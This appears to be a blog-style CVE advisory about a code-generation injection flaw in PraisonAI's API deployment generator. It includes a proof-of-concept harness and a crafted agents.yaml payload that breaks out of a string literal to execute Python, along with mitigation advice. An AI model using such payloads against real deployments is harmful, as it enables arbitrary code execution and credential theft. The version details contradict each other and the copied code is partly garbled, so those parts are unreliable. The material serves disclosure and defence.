Listen to this Post
The vulnerability resides in PraisonAI’s API deployment generator, specifically within src/praisonai/praisonai/deploy/api.py, where configuration values parsed from YAML files are unsafely interpolated directly into generated Python source code without proper literal encoding or escaping. When an operator initiates an API deployment flow using agents.yaml, functions like `generate_api_server_code()` and `start_api_server()` process deployment data such as `deploy.api.host` and `agents_file` as raw Python syntax rather than inert strings. Instead of wrapping these values using safe representation methods like `repr()` or json.dumps(), the generator places `config.host` directly between single quotes in the emitted Python code. An attacker who supplies a malicious project configuration can craft a payload containing Python expression splices that break out of the string literal context. Consequently, when the generated server module is compiled and executed at startup, the injected expressions execute with the full privileges of the operator’s process before the Flask application even handles incoming requests. Furthermore, a secondary injection vector exists in agents_file, which is embedded directly into route-handler expressions and evaluated whenever the `/agents` endpoint or related route handlers process requests, leading to arbitrary code execution across multiple application lifecycle stages.
DailyCVE Form:
Platform: PraisonAI
Version: v4.6.63 and earlier
Vulnerability: Code Generation Injection
Severity: High
date: May 12, 2026
Prediction: Patched in v4.6.34
What Undercode Say:
Bash commands and codes related to the blog
`uv run –with pydantic –with pyyaml python pov_deploy_api_config_injection.py /path/to/PraisonAI`
from pathlib import Path
import json
import sys
import tempfile
import types
import yaml
def install_stubs():
class FakeApp:
def <strong>init</strong>(self, name):
self.name = name
def route(self, args, kwargs):
def deco(func):
return func
return deco
def run(self, args, kwargs):
return None
flask = types.ModuleType("flask")
flask.Flask = FakeApp
flask.request = types.SimpleNamespace(headers={}, get_json=lambda: {"message": "hello"})
flask.jsonify = lambda obj: obj
sys.modules["flask"] = flask
flask_cors = types.ModuleType("flask_cors")
flask_cors.CORS = lambda app: app
sys.modules["flask_cors"] = flask_cors
praisonai_mod = types.ModuleType("praisonai")
class FakePraisonAI:
def <strong>init</strong>(self, agent_file):
self.agent_file = agent_file
def run(self):
return "ok"
praisonai_mod.PraisonAI = FakePraisonAI
sys.modules["praisonai"] = praisonai_mod
Exploit: (Educational Purposes!)
An attacker creates a malicious `agents.yaml` file where the `deploy.api.host` configuration parameter is injected with a Python expression splice designed to execute arbitrary code:
deploy: type: api api: host: "' + (<strong>import</strong>(\"pathlib\").Path(\"poc.txt\").write_text(\"DEPLOY_API_HOST_CODE_EXECUTED\") and \"\") + '" port: 8005 auth_enabled: false agents: - name: demo role: demo goal: demo
When `generate_api_server_code()` processes this configuration, the generated code becomes:
app.run(
host='' + (<strong>import</strong>("pathlib").Path("poc.txt").write_text("DEPLOY_API_HOST_CODE_EXECUTED") and "") + '',
port=8005,
debug=False,
)
Executing this module triggers the code execution immediately during server startup before any network traffic is processed.
Protection: from this CVE
Upgrade PraisonAI to version 4.6.34 or later where safe literal encoding is implemented.
Avoid deploying untrusted project configurations or external YAML files from unverified sources.
Ensure deployment values are treated as inert data strings by utilizing `repr()` or `json.dumps()` during code generation.
Audit deployment scripts and runtime environments for unauthorized code execution or modified configuration files.
Impact:
Arbitrary Python code execution within the deploy process when the generated API server starts or handles specific routes. The executing process can access the operator’s environment variables, source code tree, local filesystem files, model and API credentials, as well as deployment credentials, leading to full system or environment compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

